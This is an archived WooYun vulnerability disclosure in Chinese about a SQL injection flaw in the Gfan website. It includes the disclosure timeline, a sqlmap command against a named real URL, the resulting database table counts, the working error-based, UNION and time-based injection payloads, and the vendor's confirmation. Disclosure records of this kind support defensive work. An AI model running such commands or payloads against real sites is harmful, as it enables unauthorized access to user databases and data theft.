乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-30: 细节已通知厂商并且等待厂商处理中 2014-12-30: 厂商已经确认,细节仅向厂商公开 2015-01-09: 细节向核心白帽子及相关领域专家公开 2015-01-19: 细节向普通白帽子公开 2015-01-29: 细节向实习白帽子公开 2015-02-13: 细节向公众公开
机锋网存在高危SQL注入漏洞,还是2000w用户数据泄漏
sqlmap,随便拿一个数据库举例:
sqlmap -u "http://romgame.gfan.com/index.php/gtphone?areacode=*" --dbms=MySQL --risk=3 --level=5 --count -D hd --threads=10
Database: hd+----------------------+---------+| Table | Entries |+----------------------+---------+| rom_act_log | 50973 || rom_act_log_norepet | 16045 || autumn_taste_log | 1747 || autumn_draw_log | 1161 || rom_cellphone | 193 || autumn_draw_count | 162 || rom_apply_info | 110 |sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-3398 OR (SELECT 3113 FROM(SELECT COUNT(*),CONCAT(0x7178736571,(SELECT (CASE WHEN (3113=3113) THEN 1 ELSE 0 END)),0x71626f7471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (random number) - 3 columns Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-8998 UNION ALL SELECT 8335,8335,CONCAT(0x7178736571,0x6a765965564d414e516e,0x71626f7471)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-2114 OR 3908=SLEEP(5)---[12:46:20] [INFO] testing MySQL[12:46:21] [WARNING] automatically patching output having last char trimmed[12:46:21] [INFO] confirming MySQL[12:46:22] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0
危害等级:中
漏洞Rank:10
确认时间:2014-12-30 12:54
修复中,谢谢提交。。。
暂无